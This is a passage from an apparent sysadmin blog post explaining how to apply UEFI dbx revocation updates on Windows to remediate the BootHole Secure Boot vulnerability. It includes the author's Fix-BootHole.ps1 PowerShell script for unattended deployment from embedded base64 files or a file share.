.\SplitDbxContent.ps1 <path to downloaded dbxupdate.bin>

You must run this from powershell.exe built into Windows, if you try to run this from pwsh.exe for PowerShell version 7 this script will fail due to changes in the commands in later versions of PowerShell.

You should receive feedback showing that two new files were created, a signature.p7 and a content.bin

If you have multiple dbxupdates that will need to be done, save them each into a folder named after their update date, and run the SplitDbxContent.ps1 from that folder. Otherwise the above script will overwrite the signature and content files each time you re-run it.

Install DBX Update via PowerShell

Now that you have one or more pairs of signature and content files, you can use PowerShell to install the updates.

The DBX updates provided by UEFI Forum are not cumulative. This means that you must install each update individually in order to be fully protected from BootHole.

Launch an Administrative PowerShell and enter the following to apply the updates.

Set-SecureBootUefi -Name dbx -ContentFilePath "content.bin" -SignedFilePath "signature.p7" -Time "2010-03-06T19:17:21Z" -AppendWrite

Make sure you use the -Time "2010-03-06T19:17:21Z" as-is! Do not change this value otherwise it will not apply. Use this same timestamp for each and every update file.

You should receive output showing the bytes as written.

Microsoft advises to restart the PC before confirming the update applied, however in my experience you can check for the existance of these updates immediately after applying them. Though they may require a restart to actually take affect.

Confirm Updates Applied

You can confirm the updates were properly applied by using these PowerShell scripts. Download both the Check-Dbx.ps1 and Get-UEFIDatabaseSignatures.ps1 scripts. Run them against your content.bin files that were installed to confirm they exist in the UEFI firmware. Repeat for each update file that was applied.

Get-UEFIDatabaseSignatures.ps1 "content.bin"

You should get feedback that the update was applied.

All-in-One PowerShell Update Script

I had a need to remediate BootHole on dozens of PC’s, both local and remote, and since these are running a current version of Windows 10 the KB update was not an option. I followed Microsoft’s guidance and created a PowerShell script that will apply the applicable updates to a PC remotely, and without interaction.

There are some other PowerShell scripts available on GitHub that perform this task, but one of my requirements was that the script be completely self-contained. On the systems I was pushing this update script to I didn’t have a reliable way to grab the dbx update files from a file share. As such, I split them ahead of time and converted them into base64 to embed them directly into the script. The script then saves these files to disk temporarily right before applying them, then deletes them afterwards.

If you wish to use this script in a similar fashion, with the update files embedded within, grab the latest and the archived update files and follow the instructions above to split the .bin into the signature.p7 and content.bin files. You can then follow the instructions below to Base64 encode these files and paste them into the script.

Fix-BootHole.ps1 script on GitHub

Update Script Variables

If you don’t want to embed the update files directly into the script, you can optionally load them from a file share. To do so, follow the instructions previously in this article to download the dbx updates and split the .bin files into their respective signature.p7 and content.bin files.

Store these files on a file share accessible to the system you will be running this script on. Next, edit the script on line 19 to set $EmbeddedFiles to $false and update the file paths on lines 24 through 59 to the signature and content files.

If you intend to embed the files, there is no need to modify the $EmbeddedFiles or $DbxUpdateFiles variables.

Converting DBX Updates to Base64 Encoded Strings

If you want to embed the files into the script so that it is a self-contained script, follow the steps previously in this article to download the dbx updates and to split the .bin files into their respective signature.p7 and content.bin files.

With your individual signature and content files, you need to convert them into Base64 and then copy/paste the Base64 data into the appropriate variables in the script.

Run the following PowerShell code against each of the signature.p7 and content.bin files to generate a rather large string of Base64 encoded text. Piping these to clip will copy the contents directly into your clipboard so that you can paste them.

[System.Convert]::ToBase64String((Get-Content -Path ".\signature.p7" -Encoding byte)) | clip
[System.Convert]::ToBase64String((Get-Content -Path ".\content.p7" -Encoding byte)) | clip

Paste each of the signature and content Base64 code into their respective variables in the script. These are under the $DbxUpdateFiles variable. You only need to add in the architectures that you plan to deploy to, you can leave the others empty if you won’t need them.

Running the Script

You can run Fix-BootHole.ps1 after either setting the file share locations, or pasting in the embedded base64 versions of the files.

.\Fix-BootHole.ps1

Fix-BootHole.ps1 Script

For the latest script, please see the GitHub

<#
.SYNOPSIS
Applies UEFI dbx updates to fix BootHole vulnerability.

.DESCRIPTION
Applies the UEFI dbxupdates to fix the BootHole vulnerability. Prior to running,
edit this script to choose between Embedded files or link to a file share.
See https://www.rufflabs.com/post/nessus-plugin-139239-remediating-boothole-windows/

.EXAMPLE
Run the script after making required modifications as mentioned in the descriptions.
PS C:\>.\Fix-BootHole.ps1

#>

# Set this to false if you want to load the .p7 and .bin files from a file share
# instead of having them embedded within this script as base64 encoded data.
#$EmbeddedFiles = $False
$EmbeddedFiles = $True

# If using a file share instead of embedding files, update these file paths to point
# to the .p7 and .bin files for each respective update. You can only specify those that
# will be used (such as, if not using arm, ignore the arm ones.)
$DbxUpdatePaths = @{
    "x64" = @{
        "April 2021" = @{
            "signature" = "\\sampleserver\sampleshare\dbxupdates\april2021_x64\signature.p7"
            "content" = "\\sampleserver\sampleshare\dbxupdates\april2021_x64\content.bin"
        }
        "October 2020" = @{
            "signature" = "\\sampleserver\sampleshare\dbxupdates\october2020_x64\signature.p7"
            "content" = "\\sampleserver\sampleshare\dbxupdates\october2020_x64\content.bin"
        }
        "July 2020" = @{
            "signature" = "\\sampleserver\sampleshare\dbxupdates\july2020_x64\signature.p7"
            "content" = "\\sampleserver\sampleshare\dbxupdates\july2020_x64\content.bin"
        }
    }
    "x86" = @{
        "April 2021" = @{
            "signature" = "\\sampleserver\sampleshare\dbxupdates\april2021_x86\signature.p7"
            "content" = "\\sampleserver\sampleshare\dbxupdates\april2021_x86\content.bin"
        }
        "July 2020" = @{
            "signature" = "\\sampleserver\sampleshare\dbxupdates\july2020_x86\signature.p7"
            "content" = "\\sampleserver\sampleshare\dbxupdates\july2020_x86\content.bin"
        }
    }
    "arm" = @{
        "April 2021" = @{
            "signature" = "\\sampleserver\sampleshare\dbxupdates\april2021_arm64\signature.p7"
            "content" = "\\sampleserver\sampleshare\dbxupdates\april2021_arm64\content.bin"
        }
        "July 2020" = @{
            "signature" = "\\sampleserver\sampleshare\dbxupdates\july2020_arm64\signature.p7"
            "content" = "\\sampleserver\sampleshare\dbxupdates\july2020_arm64\content.bin"
        }
    }
}

# Paste in Base64 encoded files below, both signature.p7 and content.bin
# for each update and architecture as needed. Any left blank will not be applied.
$DbxUpdateFiles =  @{
    "x64" = @{
        "April 2021" = @{
            "signature" = ""
            "content" = ""
        }
        "October 2020" = @{
            "signature" = ""
            "content" = ""
        }
        "July 2020" = @{
            "signature" = ""
            "content" = ""
        }
    }
    "x86" = @{
        "April 2021" = @{
            "signature" = ""
            "content" = ""
        }
        "July 2020" = @{
            "signature" = ""
            "content" = ""
        }
    }
    "arm" = @{
        "April 2021" = @{
            "signature" = ""
            "content" = ""
        }
        "July 2020" = @{
            "signature" = ""
            "content" = ""
        }
    }
}

# CA Check adapted from https://github.com/synackcyber/BootHole_Fix/blob/main/boothole.ps1
Write-Output "Checking for matching UEFI CA"
$CAMatch = [System.Text.Encoding]::ASCII.GetString((Get-SecureBootUEFI db).bytes) -match 'Microsoft Corporation UEFI CA 2011'
if(-not $CAMatch){
    Write-Output "Microsoft Corporation UEFI CA 2011 was not found. Updates are not required on this system."
    exit
}
Write-Output "Certificate found, continuing."

# Check architecture
$ArchitectureOptions = @{
    0 = "x86"
    1 = "MIPS"
    2 = "Alpha"
    3 = "PowerPC"
    5 = "ARM"
    6 = "IA64"
    9 = "x64"
}

$Architecture = $ArchitectureOptions[[int](Get-WmiObject -Class Win32_Processor).Architecture]
$SupportedArchitectures = @("x86", "x64", "arm")

if($SupportedArchitectures -notcontains $Architecture) {
    Write-Output "This script does not support $($Architecture) based PC's, and no dbx updates are available for this architecture."
    exit
}

function Update-DbxVariable {
    param(
        $SignaturePath,
        $ContentPath
    )
    Set-SecureBootUefi -Name dbx -SignedFilePath $SignaturePath -ContentFilePath $ContentPath -Time "2010-03-06T19:17:21Z" -AppendWrite
}

Write-Output "Updating UEFI dbx variable for $($Architecture) architecture."

$UpdateFiles = @{}

if($EmbeddedFiles) {
    # Use the embedded files in this script

    Write-Output "Using embedded update files, creating files on disk."
    try {
    
        $DbxUpdateFiles.$Architecture.GetEnumerator() | ForEach-Object {
            $Release = $_.Name
            $Content = $_.Value.Content
            $Signature = $_.Value.Signature
            $TempSigFile = "$($env:temp)\$($Release)_$($Architecture)_signature.p7"
            $TempContentFile = "$($env:temp)\$($Release)_$($Architecture)_content.bin"

            # Only copy data if signature and content are not null. 
            if($null -ne $Signature -and $null -ne $Content) {
                $UpdateFiles.Add($Release, @{"Signature" = $TempSigFile; "Content" = $TempContentFile})
                
                Set-Content -Path $TempSigFile -Value ([System.Convert]::FromBase64String($Signature)) -Encoding Byte -ErrorAction Stop
                Write-Output "Created $($TempSigFile)"
                
                Set-Content -Path $TempContentFile -Value ([System.Convert]::FromBase64String($Content)) -Encoding Byte -ErrorAction Stop
                Write-Output "Created $($TempContentFile)"
            }
        }
    } catch {
        Write-Output "Error creating temporary files. Check permissions to $($env:temp)."
        exit
    }
}else{
    # Use the files from a file share location

    Write-Output "Using update files from file share."
    
    $DbxUpdatePaths.$Architecture.GetEnumerator() | ForEach-Object {
        $Release = $_.Name
        $ContentPath = $_.Value.Content
        $SignaturePath = $_.Value.Signature
        
        # Only add to the queue if both signature and content files are accessible
        if((Test-Path -Path $ContentPath) -and (Test-Path -Path $SignaturePath)) {
            Write-Output "`nPreparing: $($Release)`nSignature: $($SignaturePath)`nContent: $($ContentPath)"
            $UpdateFiles.Add($Release, @{"Signature" = $SignaturePath; "Content" = $ContentPath})
        }
    }
}

$UpdateFiles.GetEnumerator() | ForEach-Object {
    Write-Output "Applying $($_.Name) update..."
    Update-DbxVariable -SignaturePath $_.Value.Signature -ContentPath $_.Value.Content
}   

if($EmbeddedFiles) {
    $UpdateFiles.Values.Values | ForEach-Object {
        # Delete file from disk
        Write-Output "Deleting on disk $($_)"
        Remove-Item -Path $_ -ErrorAction SilentlyContinue
    }
}

References

• Windows Security Feature Bypass in Secure Boot (BootHole) - Tenable®
• ADV200011 - Security Update Guide - Microsoft - Microsoft Guidance for Addressing Security Feature Bypass in GRUB
• KB4535680: Security update for Secure Boot DBX: January 12, 2021
• Microsoft guidance for applying Secure Boot DBX update
• UEFI Revocation List File - Unified Extensible Firmware Interface Forum
• ARCHIVE - Prior Versions of DBX files - Unified Extensible Firmware Interface Forum